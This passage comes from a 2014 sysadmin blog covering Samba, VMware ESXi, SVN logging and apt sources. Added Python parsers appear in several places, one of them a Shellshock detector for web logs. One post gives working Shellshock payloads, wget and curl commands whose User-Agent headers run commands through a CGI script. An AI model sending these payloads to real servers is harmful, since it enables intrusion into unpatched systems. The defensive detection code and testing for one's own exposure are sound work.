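        return None                      # e.g. an error_log line sent on local6.err
    rec = c.groupdict()
    rec["host"] = m.group("host")
    rec["ts"] = m.group("ts")
    return rec


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """Return one hit per record whose request line, Referer or User-Agent carries "() {".

    Caveat: the combined format only records Referer and User-Agent. The Cookie and
    Host variants in the capture above are invisible here unless the LogFormat also
    logs %{Cookie}i and %{Host}i."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        fields = [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(rec[f])]
        if fields:
            hits.append({"host": rec["host"], "ts": rec["ts"], "client": rec["client"],
                         "request": rec["request"], "status": rec["status"], "fields": fields})
    return hits


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']}: shellshock probe from {h['client']} in {h['fields']}"
              f" ({h['request']} -> {h['status']})")
```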

Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get a shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  
if you see vulnerable, you're in for a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.

Wednesday, September 24, 2014

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio, because compression and security aren't really a concern there.
thus, a simple recursive cpio script for dumping a local directory to an nfs mount:
 #!/bin/sh  
 echo start "$(date)" >> /var/log/cpio.log  
 find /home/ -depth -print0 | cpio -0pdumv /nfs/mount  
 echo end "$(date)" >> /var/log/cpio.log  

Wednesday, September 17, 2014

install gcc notes

1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN) 

2) Check to make sure the install-sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local \
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 \
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0 \
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64 \
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind \
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/

or...

1) Search for an rpm package for your specific OS, e.g.:

http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34

2) You can make a symbolic link to the newly installed gcc in /usr/bin

Tuesday, August 26, 2014

samba & static wins entries

yes. you need to think about this from time to time.

 Static WINS Entries  
   
Adding static entries to your Samba WINS server is actually fairly easy. All you have to do is add a 
line to wins.dat, typically located in /usr/local/samba/var/locks or /var/run/samba.  
   
Entries in wins.dat take the form of:  
   
 "NAME#TYPE" TTL ADDRESS+ FLAGS  
   
where NAME is the NetBIOS name, TYPE is the NetBIOS type, TTL is the time-to-live as an absolute 
time in seconds, ADDRESS+ is one or more addresses corresponding to the registration, and FLAGS 
are the NetBIOS flags for the registration.  
   
A change that has been made to the wins.dat will not take effect until nmbd has been restarted. 
It should be noted that since the wins.dat file changes dynamically, nmbd should be stopped before editing 
this file. Do not forget to restart nmbd when this file has been edited.  
   
A typical dynamic entry looks like this:  
   
 "MADMAN#03" 1155298378 192.168.1.2 66R  
   
To make a NetBIOS name static (permanent), simply set the TTL to 0, like this:  
   
 "MADMAN#03" 0 192.168.1.2 66R  
   
The NetBIOS flags may be interpreted as additive hexadecimal values:  
   
 00 - Broadcast node registration  
 20 - Peer node registration  
 40 - Meta node registration  
 60 - Hybrid node registration  
 02 - Permanent name  
 04 - Active name  
 80 - Group name.  
   
The 'R' indicates this is a registration record.   
Thus 66R means: hybrid node, active and permanent NetBIOS name. These NB flag values may be found in the 
nameserv.h header file from the Samba source code repository:   
   
   
 nameserv.h  
   
 /* The wins flags. Looks like the nbflags ! */  
 #define WINS_UNIQUE     0x00 /* Unique record */  
 #define WINS_NGROUP     0x01 /* Normal Group eg: 1B */  
 #define WINS_SGROUP     0x02 /* Special Group eg: 1C */  
 #define WINS_MHOMED     0x03 /* MultiHomed */  
   
 #define WINS_ACTIVE     0x00 /* active record */  
 #define WINS_RELEASED   0x04 /* released record */  
 #define WINS_TOMBSTONED 0x08 /* tombstoned record */  
 #define WINS_DELETED    0x0C /* deleted record */  
   
 #define WINS_STATE_MASK 0x0C  
   
 #define WINS_LOCAL      0x00 /* local record */  
 #define WINS_REMOTE     0x10 /* remote record */  
   
 #define WINS_BNODE      0x00 /* Broadcast node */  
 #define WINS_PNODE      0x20 /* PtP node */  
 #define WINS_MNODE      0x40 /* Mixed node */  
 #define WINS_HNODE      0x60 /* Hybrid node */  
   
 #define WINS_NONSTATIC  0x00 /* dynamic record */  
 #define WINS_STATIC     0x80 /* static record */  
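a parser for the wins.dat record layout described above, decoding the flags with the additive table given in the post (node type in the 0x60 bits, 02 permanent, 04 active, 80 group) and picking out the static (TTL 0) entries. this is an added python example, not Samba code; the sample records besides the post's MADMAN line are constructed.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# "NAME#TYPE" TTL ADDRESS+ FLAGS  -- the record layout described above
RECORD_RE = re.compile(
    r'^"(?P<name>[^"#]{1,15})#(?P<type>[0-9A-Fa-f]{2})"\s+(?P<ttl>\d+)\s+(?P<rest>\S.*)$')

# additive flag values from the table above; the node type lives in the 0x60 bits
NODE_TYPES = {0x00: "broadcast", 0x20: "peer", 0x40: "meta", 0x60: "hybrid"}
FLAG_PERMANENT, FLAG_ACTIVE, FLAG_GROUP = 0x02, 0x04, 0x80

# constructed wins.dat: the post's dynamic MADMAN entry plus two static ones
SAMPLE_WINS_DAT = """\
"MADMAN#03" 1155298378 192.168.1.2 66R
"FILESRV#20" 0 192.168.1.20 192.168.2.20 64R
"WORKGRP#1E" 0 192.168.1.255 e4R
"""


@dataclass
class WinsRecord:
    name: str
    nb_type: int          # NetBIOS suffix, e.g. 0x20 file server, 0x03 messenger
    ttl: int
    addresses: List[str]  # ADDRESS+ : one or more, multi-homed hosts have several
    flags: int
    registration: bool    # trailing 'R'

    @property
    def is_static(self) -> bool:
        return self.ttl == 0

    @property
    def node_type(self) -> str:
        return NODE_TYPES[self.flags & 0x60]

    @property
    def permanent(self) -> bool:
        return bool(self.flags & FLAG_PERMANENT)

    @property
    def active(self) -> bool:
        return bool(self.flags & FLAG_ACTIVE)

    @property
    def group(self) -> bool:
        return bool(self.flags & FLAG_GROUP)

    def describe(self) -> str:
        kind = "static" if self.is_static else f"dynamic, ttl {self.ttl}"
        bits = [b for b, on in (("permanent", self.permanent), ("active", self.active),
                                ("group", self.group)) if on]
        return f"{self.name}<{self.nb_type:02X}> {kind}; {self.node_type} node; {', '.join(bits)}"


def parse_record(line: str) -> WinsRecord:
    """Split one wins.dat line; malformed lines and bad addresses raise ValueError."""
    m = RECORD_RE.match(line.strip())
    if m is None:
        raise ValueError(f"not a wins.dat record: {line!r}")
    tokens = m.group("rest").split()
    flag_tok, addresses = tokens[-1], tokens[:-1]
    if not addresses:
        raise ValueError(f"record without address: {line!r}")
    for addr in addresses:
        ipaddress.IPv4Address(addr)       # raises on a malformed address
    return WinsRecord(name=m.group("name"), nb_type=int(m.group("type"), 16),
                      ttl=int(m.group("ttl")), addresses=addresses,
                      flags=int(flag_tok.rstrip("R"), 16),
                      registration=flag_tok.endswith("R"))


def parse_wins_dat(text: str) -> List[WinsRecord]:
    """Parse every record line; lines not starting with a quote (headers) are skipped."""
    return [parse_record(l) for l in text.splitlines() if l.lstrip().startswith('"')]


def static_entries(records: List[WinsRecord]) -> List[WinsRecord]:
    """The permanent (TTL 0) names an admin has pinned, the ones worth auditing."""
    return [r for r in records if r.is_static]


if __name__ == "__main__":
    for r in parse_wins_dat(SAMPLE_WINS_DAT):
        print(r.describe(), "@", ", ".join(r.addresses))
```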

Friday, August 22, 2014

finding orphaned vmware templates or vmtx hell

what happens when templates and parent directories don't have consistent names, or reside in 
directories that share the same name, and of course are all over the place? you sigh.  

then you "open the book".  and when i say "open the book" i mean it the way
the portuguese mean it. think sailor talk, only worse.

vmware isn't very nice in that via vsphere you can't figure out where your "assets" reside. 

that's *okay*. gui fail.  
 
various powershell cli scripts are losers, too. what you need to do is actually query
the sql db that the vcenter uses.

so, off i go to vmware's support site; and i find this:  
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2004139  

COOL. install more junk on my system. since this is running sql server 2008 express,   
i get this:  
http://www.microsoft.com/en-us/download/details.aspx?id=7593  

flock. i go through the totally non-intuitive install for sql server 2008 management studio express.   
just install "a new instance". you're not really installing sql server 2008. i cancelled   
when i saw that under installation. i read up. and then i went for it. no worries. 

and then you run the tool.  

of course you've kept the name of your db and passwords handy, right?   
well, if you went with the vmware defaults, just do a network browse, connect to your   
local sql server express db. it should look like: YOUR_VCENTER\VIM_SQLEXP  
and do local auth. it is okay.  

you run this query that vmware support gave you:  

select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"  
From VPX_VM inner join VPX_Entity   
where VPX_VM.FILE_NAME LIKE '%VMNAME%'  
on vpx_vm.ID = vpx_entity.ID   
order by VPX_entity.name;  

it barfs. holy heck. rewrite the query and get the expected results:  

use VIM_VCDB;  
select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"  
From VPX_VM inner join VPX_Entity   
on vpx_vm.ID = vpx_entity.ID   
order by VPX_entity.name;  

and there you go. of course the datastores are completely unfriendly,   
but you can ssh into your client boxes and figure it out pretty quick.   
of course you can.  

 go get some coffee. you're awesome.  

Tuesday, August 12, 2014

old linux box old samba join old

Adding a Linux domain member machine

configure the smb.conf file with all happiness.  Include workgroup, authentication via domain, etc.

check if config is nifty fine:
% testparm

to check if ldap auth via nsswitch is okay, execute:
%getent passwd
%getent group

join the domain:
% net rpc testjoin -S 'PDC' -U Administrator%yesyes
% net rpc join -U Administrator%oreilly
(the password after the % ends up in your shell history and in ps output; leave it off and net will prompt for it.)

if errors abound, may need in smb.conf:
client schannel = no

or... just do it again.

afterwards, check if all is fine:
% smbclient -L localhostname

it should show something like:

Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          IPC       IPC Service (bollocks server (Samba 3.0.22))
        IPC$            IPC       IPC Service (bollocks server (Samba 3.0.22))
        localtest       Disk      testing in /usr/local
Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]

        Server               Comment
        ---------            -------
        FARMINGTON           bollocks server (Samba 3.0.22)
        PDC                  onthephone server (Samba 3.0.11)

        Workgroup            Master
        ---------            -------
        ONTHEPHONE           PDC

If the server is a BDC, do not forget to:

% smbpasswd -w 

Monday, August 11, 2014

oh the humanity or updating intel nic drivers on esxi 5.5.0

yeah. fun stuff. so vmware, too lazy to update your isos? search through the archives for the correct async ones and unpack the archive and upload the thing called offline-bundle and then scp up to an esxi host - be sure to have ssh service running, is that what you're telling me to do? okay.

~ # esxcli software vib install -d /vmfs/volumes/yes-local/isos/igb-5.2.5-offline_bundle-1682588.zip 

Installation Result
   Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.
   Reboot Required: true
   VIBs Installed: Intel_bootbank_net-igb_5.2.5-1OEM.550.0.0.1331820
   VIBs Removed: VMware_bootbank_net-igb_5.0.5.1.1-1vmw.550.1.15.1623387

Wednesday, August 6, 2014

ubuntu 9.04 sources.list

jaunty is my friend. it does unfs.
/etc/apt/sources.list

deb http://old-releases.ubuntu.com/ubuntu/ jaunty main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty multiverse
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates multiverse
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security multiverse

Friday, August 1, 2014

manually umount and mount an nfs volume on esx 5.5

vmware esxi 5.5 says the nfs volume is not accessible. really?
 esxcli storage nfs list  
 yep. not accessible.  
 esxcli storage nfs remove -v nfs-store  
 remove it. do whatever you do to fix the issue. then... re-add per below.  
 esxcli storage nfs add -H 192.168.6.66 -s /data/dev/nfs-store -v nfs-store  
                         ^               ^                      ^  
                         |               |                      |  
                         nfs server      |                      |  
                                         nfs export             |  
                                                            local datastore name  

Tuesday, July 29, 2014

sigh. i want to rotate these silly svn logs. i put it with the apache2 conf file, because, well, it is controlled by apache. i could totally add more in the first stanza but... the perms are off. root adm is not www-data www-data
 /var/log/apache2/*.log {  
     weekly  
     missingok  
     rotate 52  
     compress  
     delaycompress  
     notifempty  
     create 640 root adm  
     sharedscripts  
     postrotate  
         /etc/init.d/apache2 reload > /dev/null  
     endscript  
     prerotate  
         if [ -d /etc/logrotate.d/httpd-prerotate ]; then \  
             run-parts /etc/logrotate.d/httpd-prerotate; \  
         fi; \  
     endscript  
 }  
 /var/svn/logs/*.log /var/svn/logs/svn_logfile {  
     weekly  
     missingok  
     rotate 52  
     compress  
     notifempty  
     create 640 www-data www-data  
     sharedscripts  
     postrotate  
         /etc/init.d/apache2 reload > /dev/null  
     endscript  
 }  

Monday, July 28, 2014

double mint gum or svn please give me something useful

and it says, i do, i do (if logs are formatted correctly).
 per: http://svnbook.red-bean.com/en/1.6/svn-book.pdf  
 <Location /svn>  
 DAV svn  
 </Location>  
 CustomLog logs/svn_logfile "%t %u %{SVN-ACTION}e" env=SVN-ACTION  
 
results in this:  
 [26/Jan/2007:22:24:20 -0600] fritz get-dir /tags r1729 props  
 that's not useful.  
 but, more useful than:  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/vcc/default HTTP/1.1" 207 398  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/bln/59 HTTP/1.1" 207 449  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc HTTP/1.1" 207 647  
 [26/Jan/2007:22:25:29 -0600] "REPORT /svn/calc/!svn/vcc/default HTTP/1.1" 200 607  
 [26/Jan/2007:22:25:31 -0600] "OPTIONS /svn/calc HTTP/1.1" 200 188  
 [26/Jan/2007:22:25:31 -0600] "MKACTIVITY /svn/calc/!svn/act/e6035ef7-5df0-4ac0-b811-4be7c823f998 HTTP/1.1" 201 227  
 gross.  
 But if we do this:  
 CustomLog logs/svn_logfile "%{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e (%B Bytes in %T Sec)" env=SVN-ACTION  
 we get this:  
 
[2007-Jan-26 22:22:24:20] fritz@192.168.6.6 200 repo:project get-dir /tags r1729 props (10 Bytes in 10 Sec)   
 (thanks to this: http://peternixon.net/news/2010/04/09/useful-subversion-server-logs-apache-customlog/ for the clue)  
the above only works if you have your svn server set up as a virtual host.  otherwise, place that line right along with your other log directive.  
reload apache2 and there you go.

log rotation would be a good idea, too.
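once the log is in that shape it is easy to read by machine. the following is an added example of mine (not from the post or the svn book) that parses lines in the CustomLog format above and flags the two things worth a second look: a commit logged for an unauthenticated user (%u logged as -) and refused requests. it accepts the timestamp with or without brackets, and the sample lines are constructed.

```python
import re
from collections import Counter

# one line of the post's CustomLog format:
#   %{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e (%B Bytes in %T Sec)
# the brackets around the timestamp are optional: apache adds none for a custom
# %{..}t format, but the sample line in the post shows them.
LINE_RE = re.compile(
    r"^\[?(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\]?\s+"
    r"(?P<user>\S+)@(?P<host>\S+)\s+"
    r"(?P<status>\d{3})\s+"
    r"repo:(?P<repo>\S+)\s+"
    r"(?P<action>.+?)\s+"
    r"\((?P<bytes>\d+) Bytes in (?P<secs>\d+) Sec\)$"
)


def parse_line(line):
    """Split one svn_logfile line into fields; return None if it is not in this format."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("status", "bytes", "secs"):
        rec[key] = int(rec[key])
    rec["verb"] = rec["action"].split()[0]  # get-dir, commit, checkout-or-export, ...
    return rec


def review(lines):
    """Count successful commits per user and flag what a reviewer should look at:
    commits logged for an unauthenticated user (%u is '-') and refused requests
    (status >= 400). Lines in another format (plain CLF lines) are counted as skipped."""
    commits = Counter()
    flagged = []
    skipped = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            skipped += 1
            continue
        if rec["verb"] == "commit" and rec["user"] == "-":
            flagged.append(("anonymous-commit", line.strip()))
        elif rec["status"] >= 400:
            flagged.append(("refused", line.strip()))
        elif rec["verb"] == "commit":
            commits[rec["user"]] += 1
    return {"commits": dict(commits), "flagged": flagged, "skipped": skipped}


# constructed sample lines in the format above (not real log data); the last
# one is a plain CLF line to show the parser skipping it
SAMPLE = """\
[2007-01-26 22:24:20] fritz@192.168.6.6 200 repo:project get-dir /tags r1729 props (10 Bytes in 10 Sec)
[2007-01-26 22:25:31] fritz@192.168.6.6 200 repo:project commit r1730 (512 Bytes in 1 Sec)
[2007-01-26 22:26:02] -@192.168.6.9 200 repo:project commit r1731 (640 Bytes in 1 Sec)
[2007-01-26 22:26:40] hans@192.168.6.7 403 repo:project commit r1732 (0 Bytes in 0 Sec)
[26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc HTTP/1.1" 207 647
"""

if __name__ == "__main__":
    result = review(SAMPLE.splitlines())
    for kind, entry in result["flagged"]:
        print(kind + ":", entry)
    print("commits per user:", result["commits"], "skipped:", result["skipped"])
```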

Thursday, July 24, 2014

ubuntu 10.10 apt.sources

no snappy title.  i'm tired of shifting apt.sources.  is it really needed, all these name and path changes?  oh well, it keeps us sysadmins busy, right?


/etc/apt/sources.list

deb http://old-releases.ubuntu.com/ubuntu/ maverick main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick multiverse
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates multiverse
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security multiverse
After updating your file:

sudo apt-get clean
sudo apt-get update

Friday, July 18, 2014

esx is nastay or find tasks and disks and oh my 5.5 you hate my vmtx don't you

Collecting info about tasks in ESX and ESXi

COLLECTING INFORMATION ABOUT TASKS IN VMWARE ESX AND ESXI

Symptoms

While troubleshooting issues with VMware ESX and VMware vCenter, there may be differences between what vCenter and ESX consider tasks. An issue may occur when a task within vCenter server times out, and when attempting to run other tasks, it reports the error:
Another task is already in progress.

Purpose

This article provides steps to collect information about tasks for ESX and ESXi hosts.

Resolution

Note: For more information on resolving the symptoms described above, see Restarting the Management agents on an ESX or ESXi Server (1003490).
If your problem is recurring, and you need to find out which task the ESX host is taking a long time to process, you can use the following steps to isolate the task.

ESX

To collect information about tasks for ESX hosts:
  1. Log into the ESX host at the console or via SSH. For more information, see Unable to connect to an ESX host using Secure Shell (SSH) (1003807).
  2. In order to get a list of tasks on this host, run the command:

    vmware-vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated with specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vmware-vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine. Run the command:

    vmware-vim-cmd vmsvc/get.tasklist VMID

    where VMID is the number identified in step 4.

    The output is similar to:
    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the above example, the task identifier is 3887.
  7. To get information about a particular task's status, run the command:

    vmware-vim-cmd vimsvc/task_info task_identifier

    where task_identifier is the number recorded in step 6.


    The output is similar to:
    (vmodl.fault.ManagedObjectNotFound) {
       dynamicType = ,
       faultCause = (vmodl.MethodFault) null,
       obj = 'vim.Task:3887',
       msg = "The object has already been deleted or has not been completely created",
    }

ESXi

To collect information about tasks for ESXi hosts:
  1. Log into the ESXi host at the console. For more information, see Tech Support Mode for Emergency Support (1003677).
  2. In order to get a list of tasks on this host, run the command:

    vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated with specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine by running the command:

    vim-cmd vmsvc/get.tasklist VMID

    where VMID is the number identified in step 4.

    The output is similar to:
    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the above example, the task identifier is 3887.
  7. To get information about a particular task's status, run the command:

    vim-cmd vimsvc/task_info task_identifier

    where task_identifier is the number recorded in step 6.


    The output is similar to:
    (vmodl.fault.ManagedObjectNotFound) {
       dynamicType = ,
       faultCause = (vmodl.MethodFault) null,
       obj = 'vim.Task:3887',
       msg = "The object has already been deleted or has not been completely created",
    }
...

Collecting information about tasks in VMware ESXi/ESX (1013003)


Symptoms


  • While troubleshooting issues with ESXi/ESX hosts and VMware vCenter Server, there may be differences between what vCenter Server and an ESXi/ESX host considers tasks. An issue may occur when a task within vCenter Server times out, and when attempting to run other tasks, it reports the error:
Another task is already in progress.

Purpose

This article provides steps to collect information about tasks for ESXi/ESX hosts.

Resolution

Note: For more information on resolving the symptoms described above, see Restarting the Management agents on an ESXi or ESX host (1003490). If your problem is recurring, you must determine which task the ESXi/ESX host is taking a long time to process.

To isolate the task, follow the steps for the appropriate host:

ESX hosts

To collect information about tasks for ESX hosts:

  1. Log into the ESX host at the console or via SSH. For more information, see Unable to connect to an ESX host using Secure Shell (SSH) (1003807).
  2. To get a list of tasks on the host, run the command:

    vmware-vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated with specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vmware-vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine. Run the command:

    vmware-vim-cmd vmsvc/get.tasklist VMID

    Where VMID is the number identified in step 4.

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the example above, the task identifier is:

    haTask-112-vim.VirtualMachine.createSnapshot-3887
  7. To get information about a particular task's status, run the command:

    vmware-vim-cmd vimsvc/task_info task_identifier

    Where task_identifier is the string recorded in step 6.

    The output is similar to:

    (vim.TaskInfo) {
      dynamicType = ,
      key = "haTask-112-vim.VirtualMachine.createSnapshot-3887",
      task = 'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
      description = (vmodl.LocalizableMessage) null,
      name = "vim.VirtualMachine.createSnapshot",
      descriptionId = "VirtualMachine.createSnapshot",
      entity = 'vim.VirtualMachine:112',
      entityName = "deploy-test",
      state = "running",
      cancelled = false,
      cancelable = false,
      error = (vmodl.MethodFault) null,
      result = ,
      progress = 15,
      reason = (vim.TaskReasonUser) {
         dynamicType = ,
         userName = "root",
      },
      queueTime = "2012-11-28T01:29:35.233835Z",
      startTime = "2012-11-28T01:29:35.234891Z",
      completeTime = ,
      eventChainId = 2936866,
      changeTag = ,
      parentTaskKey = ,
      rootTaskKey = ,
    }

ESXi hosts

To collect information about tasks for ESXi hosts:

  1. Log into the ESXi host at the console. For more information, see Tech Support Mode for Emergency Support (1003677).
  2. To get a list of tasks on the host, run the command:

    vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated with specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine by running the command:

    vim-cmd vmsvc/get.tasklist VMID

    Where VMID is the number identified in step 4.

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the example above, the task identifier is:

    haTask-112-vim.VirtualMachine.createSnapshot-3887
  7. To get information about a particular task's status, run the command:

    vim-cmd vimsvc/task_info task_identifier

    Where task_identifier is the string recorded in step 6.

    The output is similar to:

     (vim.TaskInfo) {
      dynamicType = ,
